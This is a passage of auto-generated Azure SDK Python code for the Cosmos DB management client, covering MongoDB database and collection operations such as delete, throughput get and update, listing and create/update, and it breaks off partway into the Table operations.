client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
create_update_mongo_db_database.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/mongodb/databases/{databaseName}'}
def _delete_mongo_db_database_initial(
self, resource_group_name, account_name, database_name, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.delete_mongo_db_database.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [202, 204]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def delete_mongo_db_database(
self, resource_group_name, account_name, database_name, custom_headers=None, raw=False, polling=True, **operation_config):
"""Deletes an existing Azure Cosmos DB MongoDB database.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns None or
ClientRawResponse<None> if raw==True
:rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._delete_mongo_db_database_initial(
resource_group_name=resource_group_name,
account_name=account_name,
database_name=database_name,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
delete_mongo_db_database.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/mongodb/databases/{databaseName}'}
def get_mongo_db_database_throughput(
self, resource_group_name, account_name, database_name, custom_headers=None, raw=False, **operation_config):
"""Gets the RUs per second of the MongoDB database under an existing Azure
Cosmos DB database account with the provided name.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Throughput or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.cosmosdb.models.Throughput or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get_mongo_db_database_throughput.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Throughput', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_mongo_db_database_throughput.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/mongodb/databases/{databaseName}/settings/throughput'}
def _update_mongo_db_database_throughput_initial(
self, resource_group_name, account_name, database_name, resource, custom_headers=None, raw=False, **operation_config):
update_throughput_parameters = models.ThroughputUpdateParameters(resource=resource)
# Construct URL
url = self.update_mongo_db_database_throughput.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(update_throughput_parameters, 'ThroughputUpdateParameters')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Throughput', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def update_mongo_db_database_throughput(
self, resource_group_name, account_name, database_name, resource, custom_headers=None, raw=False, polling=True, **operation_config):
"""Update RUs per second of the an Azure Cosmos DB MongoDB database.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param resource: The standard JSON format of a resource throughput
:type resource: ~azure.mgmt.cosmosdb.models.ThroughputResource
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns Throughput or
ClientRawResponse<Throughput> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.cosmosdb.models.Throughput]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.cosmosdb.models.Throughput]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._update_mongo_db_database_throughput_initial(
resource_group_name=resource_group_name,
account_name=account_name,
database_name=database_name,
resource=resource,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('Throughput', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
update_mongo_db_database_throughput.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/mongodb/databases/{databaseName}/settings/throughput'}
def list_mongo_db_collections(
self, resource_group_name, account_name, database_name, custom_headers=None, raw=False, **operation_config):
"""Lists the MongoDB collection under an existing Azure Cosmos DB database
account.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of MongoDBCollection
:rtype:
~azure.mgmt.cosmosdb.models.MongoDBCollectionPaged[~azure.mgmt.cosmosdb.models.MongoDBCollection]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list_mongo_db_collections.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def internal_paging(next_link=None):
request = prepare_request(next_link)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
header_dict = None
if raw:
header_dict = {}
deserialized = models.MongoDBCollectionPaged(internal_paging, self._deserialize.dependencies, header_dict)
return deserialized
list_mongo_db_collections.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/mongodb/databases/{databaseName}/collections'}
def get_mongo_db_collection(
self, resource_group_name, account_name, database_name, collection_name, custom_headers=None, raw=False, **operation_config):
"""Gets the MongoDB collection under an existing Azure Cosmos DB database
account.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param collection_name: Cosmos DB collection name.
:type collection_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: MongoDBCollection or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.cosmosdb.models.MongoDBCollection or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get_mongo_db_collection.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str'),
'collectionName': self._serialize.url("collection_name", collection_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('MongoDBCollection', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_mongo_db_collection.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/mongodb/databases/{databaseName}/collections/{collectionName}'}
def _create_update_mongo_db_collection_initial(
self, resource_group_name, account_name, database_name, collection_name, resource, options, custom_headers=None, raw=False, **operation_config):
create_update_mongo_db_collection_parameters = models.MongoDBCollectionCreateUpdateParameters(resource=resource, options=options)
# Construct URL
url = self.create_update_mongo_db_collection.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str'),
'collectionName': self._serialize.url("collection_name", collection_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(create_update_mongo_db_collection_parameters, 'MongoDBCollectionCreateUpdateParameters')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('MongoDBCollection', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def create_update_mongo_db_collection(
self, resource_group_name, account_name, database_name, collection_name, resource, options, custom_headers=None, raw=False, polling=True, **operation_config):
"""Create or update an Azure Cosmos DB MongoDB Collection.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param collection_name: Cosmos DB collection name.
:type collection_name: str
:param resource: The standard JSON format of a MongoDB collection
:type resource: ~azure.mgmt.cosmosdb.models.MongoDBCollectionResource
:param options: A key-value pair of options to be applied for the
request. This corresponds to the headers sent with the request.
:type options: dict[str, str]
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns MongoDBCollection or
ClientRawResponse<MongoDBCollection> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.cosmosdb.models.MongoDBCollection]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.cosmosdb.models.MongoDBCollection]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._create_update_mongo_db_collection_initial(
resource_group_name=resource_group_name,
account_name=account_name,
database_name=database_name,
collection_name=collection_name,
resource=resource,
options=options,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('MongoDBCollection', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
create_update_mongo_db_collection.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/mongodb/databases/{databaseName}/collections/{collectionName}'}
def _delete_mongo_db_collection_initial(
self, resource_group_name, account_name, database_name, collection_name, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.delete_mongo_db_collection.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str'),
'collectionName': self._serialize.url("collection_name", collection_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [202, 204]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def delete_mongo_db_collection(
self, resource_group_name, account_name, database_name, collection_name, custom_headers=None, raw=False, polling=True, **operation_config):
"""Deletes an existing Azure Cosmos DB MongoDB Collection.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param collection_name: Cosmos DB collection name.
:type collection_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns None or
ClientRawResponse<None> if raw==True
:rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._delete_mongo_db_collection_initial(
resource_group_name=resource_group_name,
account_name=account_name,
database_name=database_name,
collection_name=collection_name,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
delete_mongo_db_collection.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/mongodb/databases/{databaseName}/collections/{collectionName}'}
def get_mongo_db_collection_throughput(
self, resource_group_name, account_name, database_name, collection_name, custom_headers=None, raw=False, **operation_config):
"""Gets the RUs per second of the MongoDB collection under an existing
Azure Cosmos DB database account with the provided name.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param collection_name: Cosmos DB collection name.
:type collection_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Throughput or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.cosmosdb.models.Throughput or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get_mongo_db_collection_throughput.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str'),
'collectionName': self._serialize.url("collection_name", collection_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Throughput', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_mongo_db_collection_throughput.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/mongodb/databases/{databaseName}/collections/{collectionName}/settings/throughput'}
def _update_mongo_db_collection_throughput_initial(
self, resource_group_name, account_name, database_name, collection_name, resource, custom_headers=None, raw=False, **operation_config):
update_throughput_parameters = models.ThroughputUpdateParameters(resource=resource)
# Construct URL
url = self.update_mongo_db_collection_throughput.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str'),
'collectionName': self._serialize.url("collection_name", collection_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(update_throughput_parameters, 'ThroughputUpdateParameters')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Throughput', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def update_mongo_db_collection_throughput(
self, resource_group_name, account_name, database_name, collection_name, resource, custom_headers=None, raw=False, polling=True, **operation_config):
"""Update the RUs per second of an Azure Cosmos DB MongoDB collection.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param collection_name: Cosmos DB collection name.
:type collection_name: str
:param resource: The standard JSON format of a resource throughput
:type resource: ~azure.mgmt.cosmosdb.models.ThroughputResource
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns Throughput or
ClientRawResponse<Throughput> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.cosmosdb.models.Throughput]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.cosmosdb.models.Throughput]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._update_mongo_db_collection_throughput_initial(
resource_group_name=resource_group_name,
account_name=account_name,
database_name=database_name,
collection_name=collection_name,
resource=resource,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('Throughput', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
update_mongo_db_collection_throughput.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/mongodb/databases/{databaseName}/collections/{collectionName}/settings/throughput'}
def list_tables(
self, resource_group_name, account_name, custom_headers=None, raw=False, **operation_config):
"""Lists the Tables under an existing Azure Cosmos DB database account.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of Table
:rtype:
~azure.mgmt.cosmosdb.models.TablePaged[~azure.mgmt.cosmosdb.models.Table]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list_tables.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def internal_paging(next_link=None):
request = prepare_request(next_link)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
header_dict = None
if raw:
header_dict = {}
deserialized = models.TablePaged(internal_paging, self._deserialize.dependencies, header_dict)
return deserialized
list_tables.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/table/tables'}
def get_table(
self, resource_group_name, account_name, table_name, custom_headers=None, raw=False, **operation_config):
"""Gets the Tables under an existing Azure Cosmos DB database account with
the provided name.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param table_name: Cosmos DB table name.
:type table_name: str
:param dict custom_headers: headers that will be added to the request
